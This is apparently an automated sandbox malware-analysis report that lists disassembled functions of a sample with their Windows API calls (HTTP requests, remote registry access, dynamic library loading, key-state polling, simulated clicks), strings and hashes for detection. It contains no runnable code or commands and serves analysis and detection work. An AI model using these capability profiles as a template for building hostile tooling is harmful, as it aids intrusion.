Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002A8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002A8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 002A8F57

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

Strings

ComboBox, xrefs: 002A8E9E
ListBox, xrefs: 002A8ED3

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: bf7fba26be6f6d5decc5b882f13ea3ff6758461d473f68058a56204213f804ed
Instruction ID: f5fab413a3bd4a12ca4f93d44383badaae8179ad008c07ace22552a4cf6c7056
Opcode Fuzzy Hash: bf7fba26be6f6d5decc5b882f13ea3ff6758461d473f68058a56204213f804ed
Instruction Fuzzy Hash: D321E171A21105BFDB14ABB09C8A9FEB779DF06320B148119F825961E1DF3948299A50

Function 002C182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002C184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002C18A2
InternetCloseHandle.WININET(00000000), ref: 002C18E9

Part of subcall function 002C2483: GetLastError.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C2498
Part of subcall function 002C2483: SetEvent.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C24AD

Strings

, xrefs: 002C1893

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: af3fa99f19a4ecb680d7da9ba22bfff9cfef2fa7590fa420c5111c36e1828a46
Instruction ID: 200adb6dc825c2d7f2230a271585d566d84e361904ba53ea620bb030c73ae1ac
Opcode Fuzzy Hash: af3fa99f19a4ecb680d7da9ba22bfff9cfef2fa7590fa420c5111c36e1828a46
Instruction Fuzzy Hash: 6521AFB1524209BFFB11AF609C86FBB77ADEF49744F10422EF90592141DA609D245BA1

Function 002D63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002D6461
LoadLibraryW.KERNEL32(?), ref: 002D6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002D647D
DestroyWindow.USER32(?), ref: 002D6485

Strings

SysAnimate32, xrefs: 002D643C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 0ceeef769ffced74df1cfc14ca759395e10eef0a76036c29ed49f2e5a3c8f2c3
Instruction ID: 47555ba1cf7e170563cdc386745c89d240dbcf5946916d4999ef2c564af3257a
Opcode Fuzzy Hash: 0ceeef769ffced74df1cfc14ca759395e10eef0a76036c29ed49f2e5a3c8f2c3
Instruction Fuzzy Hash: 4F218E71120206AFEF204F64DC48EBB37ADEB58764F10862AF95092290D771DC619B60

Function 002B6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002B6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B6DEF
GetStdHandle.KERNEL32(0000000C), ref: 002B6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002B6E3B

Strings

nul, xrefs: 002B6E36

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: a90a621793c085cf78d2a6b5222af4d0f33fa7b59c0e2c5d1b4390a3c35fd70c
Instruction ID: bd1ca146b994a6d57a86179c6483cf6056172b9d5f4e8e2014ef60f460b50b40
Opcode Fuzzy Hash: a90a621793c085cf78d2a6b5222af4d0f33fa7b59c0e2c5d1b4390a3c35fd70c
Instruction Fuzzy Hash: AE21817561020BABDB209F29DC0CADA7BA4EF45760F204A2AFCA1D72D0D7749D608B54

Function 002B6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002B6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B6EBB
GetStdHandle.KERNEL32(000000F6), ref: 002B6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002B6F06

Strings

nul, xrefs: 002B6F01

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 4079d17c9db9d8457e38be6e403ba3b64e31fedaef6c312a7e137df1e9e829a2
Instruction ID: 3f62396de48fedf8088d5c5bae17191615b77370f765c72878aefd1df5423eae
Opcode Fuzzy Hash: 4079d17c9db9d8457e38be6e403ba3b64e31fedaef6c312a7e137df1e9e829a2
Instruction Fuzzy Hash: DD2190799103069BDB209F69DC0CEEA77A8EF457A0F200A1AFDA1D72D0D774E8608B54

Function 002BAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002BAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002BACA8
__swprintf.LIBCMT ref: 002BACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,002DF910), ref: 002BACFF

Strings

%lu, xrefs: 002BACBB

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 2fc4abc03e13f51017a51fdb21edda7218ebc9c90646dab0d42e9102c4af1670
Instruction ID: db1cf26005adb8e832fa28e46dbf0c4c95d3f6dd76aa410a2f891878d026fa15
Opcode Fuzzy Hash: 2fc4abc03e13f51017a51fdb21edda7218ebc9c90646dab0d42e9102c4af1670
Instruction Fuzzy Hash: FE216D70A10209AFCB10EF64DD45DEEBBB8EF49715B0040A9F909AB251DA31EE55CF61

Function 002B1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B118E
Sleep.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B11C1

Strings

@+, xrefs: 002B119D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @+
API String ID: 2875609808-2529809375
Opcode ID: f80f05852c65f0eb7745716b9f708dec13035ce7f9fd0bc4ddd509fe9cc9393a
Instruction ID: 8504e2ad2372c729303ed0cbe9391450e9a14e876e99d66e6d9368c410220071
Opcode Fuzzy Hash: f80f05852c65f0eb7745716b9f708dec13035ce7f9fd0bc4ddd509fe9cc9393a
Instruction Fuzzy Hash: A4118231C2151DE7CF00DFA8D9586EEBB78FF09751F404056DA49B6240CB709970DBA5

Function 002B1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002B1B19

Strings

EXISTS, xrefs: 002B1B41
APPEND, xrefs: 002B1B52
REMOVE, xrefs: 002B1B1F
KEYS, xrefs: 002B1B30

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: a0507e44e5e09046815aa64716704f9b95ab21b41a92e91e2a93d74303c79b6e
Instruction ID: 6c8803aa938f49dcb846d1de315c516a9df7063b6c14dbbd8389adcbf0175a6c
Opcode Fuzzy Hash: a0507e44e5e09046815aa64716704f9b95ab21b41a92e91e2a93d74303c79b6e
Instruction Fuzzy Hash: 28117C349212098BCF00EF54D8A28EEB3B4BF26708F508465D85467691EB325D2ACF40

Function 002CEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002CEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 002CEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002CED6A
CloseHandle.KERNEL32(?), ref: 002CEDEB

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 680f1eec6f4ca753498a6501858f37085e40fbf21dee764c3d7b76dcf0ecb607
Instruction ID: 553c1e6765c1001af91ec33da1ed587827f9abe4617af3418861914004e3ed45
Opcode Fuzzy Hash: 680f1eec6f4ca753498a6501858f37085e40fbf21dee764c3d7b76dcf0ecb607
Instruction Fuzzy Hash: FE8191716103019FDB60EF28C846F2AB7E5AF44710F05891DF99ADB292DBB0AC54CF56

Function 002D0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002D0183
RegCloseKey.ADVAPI32(?,?), ref: 002D01AF
RegCloseKey.ADVAPI32(00000000), ref: 002D01BC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 25cfa5fa8c148a92661a7c5df06b7ed09946c43456a4e6e573e9d0e5548406e6
Instruction ID: 5d5dfcb40fa20d96d6784237713f3b1d156f67e8d58fc48e0d33e4de07ebed40
Opcode Fuzzy Hash: 25cfa5fa8c148a92661a7c5df06b7ed09946c43456a4e6e573e9d0e5548406e6
Instruction Fuzzy Hash: D8515C71628204AFC704EF68D885F6AB7E8BF84304F44491EF959872A1DB31ED18CF56

Function 002CD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002CD927
GetProcAddress.KERNEL32(00000000,?), ref: 002CD9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 002CD9C6
GetProcAddress.KERNEL32(00000000,?), ref: 002CDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002CDA21

Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 5c48fcc2941385332d55b24576dffee668221c2fabe9e100ae71bfa976792cb6
Instruction ID: 35e59bf6383d11906fa28a578fd7e3795dbb9726fc7cc40483d462537e510454
Opcode Fuzzy Hash: 5c48fcc2941385332d55b24576dffee668221c2fabe9e100ae71bfa976792cb6
Instruction Fuzzy Hash: E3512875A10206DFCB00EFA8C494EADB7F4EF09314B148169E81AAB322D730ED55CF94

Function 002BE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002BE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002BE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002BE687

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002BE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002BE6B4

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 066335187856b6414724daf52150c7b463a167b9376cb46131f1f3b17d70cc37
Instruction ID: b1f4cd98f40c58799a43663be9090c73c7aa8a3d55a3c1bad13794f41771a813
Opcode Fuzzy Hash: 066335187856b6414724daf52150c7b463a167b9376cb46131f1f3b17d70cc37
Instruction Fuzzy Hash: 42513935A10605DFCB00EF64C9859AEBBF5EF09314B1480A9EC09AB361CB31ED64DF54

Function 002DA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccbf70aaf1d7574b896239263e4d6b69822f8b04f1dd723286e89f0a808a6a36
Instruction ID: dd23e410533fcda390f7f31cfba434736b8f2e1545d0f5fd6b87e1f09a960188
Opcode Fuzzy Hash: ccbf70aaf1d7574b896239263e4d6b69822f8b04f1dd723286e89f0a808a6a36
Instruction Fuzzy Hash: 3A41D235925105AFD720DF28DC49FA9BBA8EB09311F144267F81AA73E0C770ED61DA51

Function 00252344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00252357
ScreenToClient.USER32(003157B0,?), ref: 00252374
GetAsyncKeyState.USER32(00000001), ref: 00252399
GetAsyncKeyState.USER32(00000002), ref: 002523A7

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 04ee1d1bf7dc84622f09c442455c059dbc33f460bdbbdb1953c429dd69b02bb2
Instruction ID: bc3d9033c6099ad75aac38131ba8811eab4f901d6fbca0b56dcd2cbb075d0d3b
Opcode Fuzzy Hash: 04ee1d1bf7dc84622f09c442455c059dbc33f460bdbbdb1953c429dd69b02bb2
Instruction Fuzzy Hash: D7418435924106FBCF159F68C848AE9BB74FB05361F20435AF829922D0C7749D68DFA5

Function 002A63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 002A6433
TranslateMessage.USER32(?), ref: 002A645C
DispatchMessageW.USER32(?), ref: 002A6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A6475

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 22d097c9eeb8515ccadfbe55584afc430286dbd1a3fb86a570d6a1e71caab7c7
Instruction ID: fc42e6a88de654d5e1721c6605f8a3a97ddefe6850f33bed1ff3a267f9b38d56
Opcode Fuzzy Hash: 22d097c9eeb8515ccadfbe55584afc430286dbd1a3fb86a570d6a1e71caab7c7
Instruction Fuzzy Hash: B331C631920647DFDB75CF70DC4CBF67BACAB0A300F184565E525C21A0EB7598A9D760

Function 002A8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 002A8A30
PostMessageW.USER32(?,00000201,00000001), ref: 002A8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002A8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 002A8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002A8AF8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 6f8273668e2ee784724f00081c2b08a600d05848076e40f8feea816af1ad1864
Instruction ID: 3ede11a46112d535a920dc50aa56a59a5aa75e74462d889a6cebd190ad4b6f64
Opcode Fuzzy Hash: 6f8273668e2ee784724f00081c2b08a600d05848076e40f8feea816af1ad1864
Instruction Fuzzy Hash: 9931A07190021AEBDF14CFA8D94DA9E7BB5FB05315F10822AF925E61D1CBB09D24DB90

Function 002AB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 002AB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002AB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002AB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002AB27F
_wcsstr.LIBCMT ref: 002AB289

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

